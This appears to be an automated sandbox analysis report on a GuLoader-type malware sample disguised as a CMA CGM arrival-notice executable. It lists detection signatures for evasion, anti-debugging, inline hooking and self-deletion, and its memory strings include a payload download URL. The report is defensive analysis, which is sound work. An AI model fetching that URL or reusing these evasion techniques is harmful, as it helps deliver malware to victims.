Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000000.927484403.0000000000448000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesmedesvende.exe vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Binary or memory string: OriginalFilenamesmedesvende.exe vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
PE file contains strange resources
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Virustotal: Detection: 25%
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe ReversingLabs: Detection: 18%
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/0@10/8
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Binary string: wntdll.pdbUGP source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.1746538018.0000000004840000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, rundll32.exe
Source: Binary string: rundll32.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp
Source: Binary string: rundll32.pdbGCTL source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.929197382.0000000000780000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_004064C4 push ebp; iretd 0_2_004064C6
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0040A8F6 push esi; ret 0_2_0040A97B
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00403171 push ds; ret 0_2_00403172
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00404979 push esi; ret 0_2_00404980
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00407B84 push es; ret 0_2_00407B85
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790749 push FFFFFF85h; retf 0_2_00790753
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078089F push 2FA9C30Eh; ret 0_2_007808F5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007899BC push FFFFFF85h; retf 0805h 0_2_007899EB
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E65D0D1 push ecx; ret 12_2_1E65D0E4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_00574CB6 push ds; iretd 12_2_00574CB7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048BD0D1 push ecx; ret 14_2_048BD0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00817057 push ebx; retf 14_2_0081705E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081B059 push edx; ret 14_2_0081B05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0080E3F4 push edi; ret 14_2_0080E408
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0080E325 push edx; retf 14_2_0080E326
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00816B58 push ebp; retf 14_2_00816B5A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081E490 push cs; ret 14_2_0081E492
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00804556 push edi; retf 14_2_00804559
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081CEA5 push eax; ret 14_2_0081CEF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081CEF2 push eax; ret 14_2_0081CEF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081CEFB push eax; ret 14_2_0081CF62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00817622 push FFFFFFC4h; iretd 14_2_00817632
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00817636 push ds; ret 14_2_00817637
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081CF5C push eax; ret 14_2_0081CF62
PE file contains an invalid checksum
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Static PE information: real checksum: 0x791f7 should be: 0x73bc1

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE2
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\rundll32.exe Process created: /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmp, NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://WWW.PAULASSINKARCHITECT.NL/BIN_FDIYU115.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000008098E4 second address: 00000000008098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000809B4E second address: 0000000000809B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5076 Thread sleep count: 88 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5076 Thread sleep time: -176000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790523 rdtsc 0_2_00790523
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe System information queried: ModuleInformation Jump to behavior
Source: explorer.exe, 0000000D.00000000.1242795289.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://www.paulassinkarchitect.nl/bin_fDiyu115.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: explorer.exe, 0000000D.00000000.1196380062.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000D.00000000.1242795289.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWxL
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258621703.00000000009A6000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000D.00000000.1213774669.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000000D.00000000.1243122844.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmp, NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 0000000D.00000000.1243122844.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790523 rdtsc 0_2_00790523
Enables debug privileges
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007875D7 mov eax, dword ptr fs:[00000030h] 0_2_007875D7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078752F mov eax, dword ptr fs:[00000030h] 0_2_0078752F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007875F9 mov eax, dword ptr fs:[00000030h] 0_2_007875F9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007918D3 mov eax, dword ptr fs:[00000030h] 0_2_007918D3
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00791915 mov eax, dword ptr fs:[00000030h] 0_2_00791915
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078FCF5 mov eax, dword ptr fs:[00000030h] 0_2_0078FCF5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078FCB7 mov eax, dword ptr fs:[00000030h] 0_2_0078FCB7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078AD21 mov eax, dword ptr fs:[00000030h] 0_2_0078AD21
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00785EAC mov eax, dword ptr fs:[00000030h] 0_2_00785EAC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078EF53 mov eax, dword ptr fs:[00000030h] 0_2_0078EF53
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6BB260 mov eax, dword ptr fs:[00000030h] 12_2_1E6BB260
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6BB260 mov eax, dword ptr fs:[00000030h] 12_2_1E6BB260
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61766D mov eax, dword ptr fs:[00000030h] 12_2_1E61766D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D8A62 mov eax, dword ptr fs:[00000030h] 12_2_1E6D8A62
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h] 12_2_1E62AE73
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h] 12_2_1E62AE73
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h] 12_2_1E62AE73
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h] 12_2_1E62AE73
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h] 12_2_1E62AE73
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E64927A mov eax, dword ptr fs:[00000030h] 12_2_1E64927A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E609240 mov eax, dword ptr fs:[00000030h] 12_2_1E609240
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E609240 mov eax, dword ptr fs:[00000030h] 12_2_1E609240
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E609240 mov eax, dword ptr fs:[00000030h] 12_2_1E609240
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E609240 mov eax, dword ptr fs:[00000030h] 12_2_1E609240
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h] 12_2_1E617E41
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h] 12_2_1E617E41
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h] 12_2_1E617E41
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h] 12_2_1E617E41
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h] 12_2_1E617E41
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h] 12_2_1E617E41
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E694257 mov eax, dword ptr fs:[00000030h] 12_2_1E694257
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60E620 mov eax, dword ptr fs:[00000030h] 12_2_1E60E620
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6BFE3F mov eax, dword ptr fs:[00000030h] 12_2_1E6BFE3F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60C600 mov eax, dword ptr fs:[00000030h] 12_2_1E60C600
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60C600 mov eax, dword ptr fs:[00000030h] 12_2_1E60C600
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60C600 mov eax, dword ptr fs:[00000030h] 12_2_1E60C600
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E638E00 mov eax, dword ptr fs:[00000030h] 12_2_1E638E00
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E618A0A mov eax, dword ptr fs:[00000030h] 12_2_1E618A0A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E623A1C mov eax, dword ptr fs:[00000030h] 12_2_1E623A1C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63A61C mov eax, dword ptr fs:[00000030h] 12_2_1E63A61C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63A61C mov eax, dword ptr fs:[00000030h] 12_2_1E63A61C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6316E0 mov ecx, dword ptr fs:[00000030h] 12_2_1E6316E0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6176E2 mov eax, dword ptr fs:[00000030h] 12_2_1E6176E2
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E648EC7 mov eax, dword ptr fs:[00000030h] 12_2_1E648EC7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6BFEC0 mov eax, dword ptr fs:[00000030h] 12_2_1E6BFEC0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6336CC mov eax, dword ptr fs:[00000030h] 12_2_1E6336CC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D8ED6 mov eax, dword ptr fs:[00000030h] 12_2_1E6D8ED6
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h] 12_2_1E6052A5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h] 12_2_1E6052A5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h] 12_2_1E6052A5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h] 12_2_1E6052A5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h] 12_2_1E6052A5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D0EA5 mov eax, dword ptr fs:[00000030h] 12_2_1E6D0EA5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D0EA5 mov eax, dword ptr fs:[00000030h] 12_2_1E6D0EA5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D0EA5 mov eax, dword ptr fs:[00000030h] 12_2_1E6D0EA5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6846A7 mov eax, dword ptr fs:[00000030h] 12_2_1E6846A7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61AAB0 mov eax, dword ptr fs:[00000030h] 12_2_1E61AAB0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61AAB0 mov eax, dword ptr fs:[00000030h] 12_2_1E61AAB0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63FAB0 mov eax, dword ptr fs:[00000030h] 12_2_1E63FAB0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E69FE87 mov eax, dword ptr fs:[00000030h] 12_2_1E69FE87
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63D294 mov eax, dword ptr fs:[00000030h] 12_2_1E63D294
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63D294 mov eax, dword ptr fs:[00000030h] 12_2_1E63D294
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60DB60 mov ecx, dword ptr fs:[00000030h] 12_2_1E60DB60
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61FF60 mov eax, dword ptr fs:[00000030h] 12_2_1E61FF60
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D8F6A mov eax, dword ptr fs:[00000030h] 12_2_1E6D8F6A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E633B7A mov eax, dword ptr fs:[00000030h] 12_2_1E633B7A
